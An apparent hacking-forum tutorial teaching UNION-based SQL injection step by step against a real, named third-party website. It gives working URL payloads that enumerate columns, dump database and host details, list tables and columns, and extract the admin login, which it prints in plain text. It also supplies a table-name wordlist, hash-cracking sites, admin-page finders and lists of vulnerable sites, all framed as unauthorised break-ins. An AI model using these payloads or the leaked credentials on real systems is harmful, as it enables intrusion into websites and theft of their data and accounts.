Zer0Freak SQLi Tutorials
Difficulty: Basic Level 2 and Intermediate
Requirements: Patience,intuition and understanding
Estimated time to read the chapter: 25-30 min (reading thoroughly will help you understand better)
The method used to extract information from a database in a website using SQL injection queries on the URL/Address bar is what we're gonna learn today.
Previous tutorial: Bypassing Login Pages with SQL injection (Basics and Intermediate)
- There are many types of SQL injection when it comes to web hacking
- What we learned in the previous tutorial was the only Basics where were used it to bypass Admin/User logins.
- However, what will you do if can't bypass it even though it's vulnerable to SQL injection?
- Well, the answer is simple. You do the process on your URL/Address bar instead of the text boxes on an admin/user login page
Common Types of SQL injection are:
Code:
UNION Based SQL injection
String Based SQL injection
Error Based SQL injection
Double Query SQL injection
Blind SQL injection
MsSQL injection
Alright before we start we need to know how a website works while it stores Login information/pages/pictures/etc. in its database
Lets just say that our website will look like this :
"http://www.site.com/index.php?id=5"
Notice at the end of the URL, "id=5"
This is what the query will look like
PHP Code:
SELECT * FROM index
WHERE id = 5
Step1: Finding the vulnerability in a website
It'll be like a small puzzle you have to solve. See, you can't just hack a website like http://www.site.com -.-
To hack a website, you need to scan it yourself by clicking links and find out if there's something like "index.php?id=XXX" where "XXX" is a random integer (number) or string (word).
Alright now to find sites vulnerable to SQLi is using Google Dorks.
If you don't know how to use dorks, visit Part 1 of this project to learn all about them
Once you've found a site vulnerable to SQLi, it's time to execute queries.
For this tutorial, we'll be using "http://www.leadacidbatteryinfo.org" as an example.
Try browsing the website and see if you can find links like "index.php?id=xxx"
It can be anything like "details.php?id=xxx" or "gallery.php?id="
Just find an address with a number at the end of the URL
Here's what I found "http://www.leadacidbatteryinfo.org/newsdetail.php?id=51"
Now to test for vulnerabilities is by ADDING a quote " ' " at the end of the url i.e after the integer or string
So it'll look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51'
Now you'll notice an error saying
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Spoiler (Click to View)
How is this possible?
Look at the query when we added a quote " ' "
PHP Code:
SELECT * FROM article
WHERE id = 5 '
This is why they return an error result
Now that we know the website is vulnerable to SQL injection, let's advance to the next process
Step2: Finding the number of columns a website has
This is the part where most people had commonly misunderstood.
To get to the point, what we're about to do is find how many columns the website has using NoError/Error statements.
Alright lets get started.
The query we'll be using is "order by X--" where "X" is a random integer (number)
Start by entering "order by 25--"
Enter it at the end of the URL, so it'll look like this
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--
Now lets try "order by 20--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 20--
How about we go down a bit to "order by 5--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 5--
Now lets go up to "order by 11--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--
See if we can increase to "order by 12--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--
Therefore, the website has 11 columns
Tips:
An error while scanning for number of columns will look like this
Spoiler (Click to View)
Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement
First off, we need to know what does "UNION SELECT" means
Lets say we have 2 tables, "users" and "admin"
Basically, UNION SELECT is a statement where all these information will be collected as one.
Look at this query
PHP Code:
SELECT * FROM users
UNION SELECT * FROM admin
The point is that, UNION SELECT returns our results with the information we need
If you want to find vulnerable columns, use UNION SELECT
If you want to find version of database, UNION SELECT
If you want admin information! use UNION SELECT
Alright, now that we know something about the Union function, lets continue.
Take our website that has 11 columns and add a "UNION SELECT" statement.
Here's how our query will look like
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
Focus on something like this, "index.php?id=-X UNION SELECT N--"
Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens " -- " and another hyphen " - " beside "X"
Step4: Random numbers appear on screen, the next step
Alright I'm pretty sure you'll find a bunch of numbers showing up on the screen.
These are known as "vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract.
Here's how it'll look like:
Spoiler (Click to View)
So, in this case we have number "8"
Now you might be asking, what can I do with a vulnerable column?
Well here's what you can get-- INFORMATION!
You need a lot of information to study from the website, here are a couple of examples.
Replace the vulnerable column i.e number 8 with a statement
Statements:
Code:
@@version, version()
database(),
user(),
@@hostname
@@datadir
@@version/version() = find the version of the database
database() = find the current database
user() = find the user information
@@hostname = Current hosting info
@@datadir = directory of the data of the website
To find the version of the database in the website, replace the vulnerable column i.e number 8 with "@@version" or "version()
It'll look like this
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--
Code:
5.1.52-log
Note:
Database version less than 5 "<5" = you need to guess tables (a bit hard work)
Database version greater than 5 ">5" = easy to inject with another function i.e group_concat
user
username
usernames
admin
admins
users
manager
account
accounts
member
login
logins
members
tbl_user
tbl_users
tbl_admin
tbl_admins
tbl_member
tbl_members
tbladmins
memberlist
tbluser
tblusers
tblmanager
tblmanagers
tblclients
tblservers
adminuser
usertbl
userstbl
admintbl
adminstbl
id
tuser
tusers
uid
userid
user_id
auid
adminpass
LoginID
FirstName
LastName
cms_user
cms_member
cms_users
cms_members
cms_admin
cms_admins
user_admin
user_info
user_list
user_login
user_logins
user_names
userrights
userinfo
userlist
webadmin
webadmins
Webmaster
Webuser
product
products
tblproducts
tblproduct
tbl_tbadmin
Adminlogin
We'll be knowing how to get the tables in the next step.But for now, let's see what we can get with other statements
Lets try all statements at once shall we
The URL will look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@datadir,@@hostname,user()),9,1 0,11--
Code:
32908_leadacidbatteryinfoorg5.1.52-log/mnt/cluster/data/mysql1.myregisteredsite.com32908_user116602@lnh-www1h.bluehalo.myregisteredsite.com
3
Look close here, we used a command "group_concat"
Here's its function:
Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database())
Note:Group_concat won't work with versions less than 5
Step5:Getting the table names
What are tables?
Tables contain columns and columns contain the data
It's like a stack (table) of books (columns) and data inside the books (data inside the columns)
Alright, first lets look up some functions we're gonna use to extract table names (Important)
Code:
group_concat = grouping up data to a specific statement
table_name = tables names to be shown on screen
from = location of a specified statement
information_schema.tables = information in the database with table names in it
table_schema = tables in a database
database() = current database in the website
0x0a = a Hex code that creates a new line for organizing tables in an order
So, here's what our link will look like:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--
and then we added a
"from information_schema.tables where table_schema=database()--"
after the last column (excluding the two hyphens after 11)
Results on table names:
Code:
pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews
Spoiler (Click to View)
that, you have to find tables where user/admin information are stored
In this case, "tbladmin" seems to be having an admin information stored in it.
It's all about predicting and expecting what's behind every table you see
Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
Replace and Add the following
Vulnerable Column = replace with "group_concat(table_name,0x0a)"
After the last column = Add "from information_schema.tables where table_schema=database()--"
Also, don't forget about UNION SELECT before the column numbers and the hyphen ( - ) before "X" at index.php?id=X where "X" is a random integer/string
Step6:Getting Columns from Tables
Alright obviously, our next task is to get the column names from a specific table which in our case was "tbladmin'
To do this, we're gonna have to alter some queries a bit
Now look closely at this syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--
table_name = replaced by "column_name"
information_schema.tables = replaced by "information_schema.columns"
table_schema = replaced by "table_name"
database() = replaced by "0x74626c61646d696e--"
Now that you know the replacements in our syntax, you still might be wondering what's up with the last part where entered "0x74626c61646d696e--"
First of all, these are known as Hex
To make a Hex readable, we put "0x" at the beginning
I'll explain this briefly. So our table name was "tbladmin"
To enter that table using the syntax above, we have to convert that table name to Hex
In order to do that, visit this website:
http://www.swingnote.com/tools/texttohex.php
It's a text to hex converter
Enter "tbladmin" in the text box and hit convert
You'll notice the results will be "74626c61646d696e" (that's the hex)
Now to make it readable to the website, add "0x" at the beginning
So it will be:
Code:
0x74626c61646d696e
Now you know how Hex works, lets look up some functions we replaced and know their uses (Important)
Code:
group_concat(column_name,0x0a) = grouping the column names we're going to extract
information_schema.columns = column names stored in database
table_name = extracting column from a specific table
0xHEX_Code_Table = Specific table name converted to hex
Code:
adminid ,username ,password ,dom
Spoiler (Click to View)
What we're gonna need here is obviously only the "username" and "password"
Step7:Getting Data from Columns
Alright, lets extract the information
Look closely at the syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x0a),9,10,11 from tbladmin--
Code:
http://www.site.com/index.php?id=-X UNION SELECT N,group_concat("columnName,0x3a,columnName,0x0a) from "tablename"--
CONTINUED BELOW
Now for revising,
column names = username, password
separator = 0x3a (a hex for a colon " : ")
table name = tbladmin
Once you execute that syntax, you get the username and password separated by a colon
Results after executing the syntax:
Code:
ishir:ishir123
Password: ishir123
Special cases: Hashed Usernames and Passwords
Most websites will have their passwords hashed as MD5
In this case you'll need to crack them.
Using some websites will help you
Here's a list of Hash cracking websites:
Code:
www.md5decrypter.co.uk/
www.md5this.com/
www.md5crack.com/
http://hashchecker.de/find.html
Code:
21232f297a57a5a743894a0e4a801fc3 -- 32 characters
Code:
d033e22ae348aeb5660fc2140aec35850c4da997 -- 40 characters
But for now, refer to this for a little knowledge about hashes
http://www.hackforums.net/showthread.php?tid=1393830
Credits to Haxor and Insidepro
Last Step: Finding the admin page and logging in for the goods
Alright, now that we have our admin login info
Username: ishir
Password: ishir123
It's time to find the login pages
To do this, you can use Admin Page Finders
Here's some you can use
>>Scorpion Admin Page Finder<<
http://sc0rpion.ir/af/
>>Outlaw Admin Page Finder<<
http://www.tools.th3-0utl4ws.com/admin-finder/
>>Napsterakos Admin Page Finder<<
http://www.hackforums.net/showthread.php...ight=HaviJ
>>HaviJ Injector/Cracker and Admin page finder<<
http://www.hackforums.net/showthread.php...age+finder
Alright after scanning the website for admin pages, you should see something like this:
Code:
http://www.leadacidbatteryinfo.org/admin/
However, some websites could be already hacked and messed up
Which in our case, this website was already messed up in such a way you can't login as an admin anymore.
These are just the basics of SQL injection.
There are lots of websites to hack and more to practice with.
Just so that you'll get a clear view of this tutorial, look up a demonstration video on how I inject a site with UNION Based/Normal SQL injection:
Extras:
Acunetix Web Vulnerability Scanner:
Features: Scans a specific website of your choice for vulnerabilities and directories too
Download it by clicking here
SQL Poizon:
Scans for dorks, crawls a lot of websites at a time, organized work space for SQL injection, and a built-in browser
http://www.hackforums.net/showthread.php...SQL+poizon
SQL injection vulnerable lists:
Lists by iTz Ryannn x
http://pastebin.com/y2jD5Fgz
Lists made by Dyme
http://pastebin.com/kVMYX0Eh
Thanks for reading this tutorial and I hope you enjoyed and learn a lot from it
End of Chapter 3
Upcoming chapter: Error Based SQL injection Detailed
Need any help: zerofreak@live.com
Please stay tuned to MegaProjectSQLi by Zer0freak for more tutorials.
Have a great day
Categories:
sql injection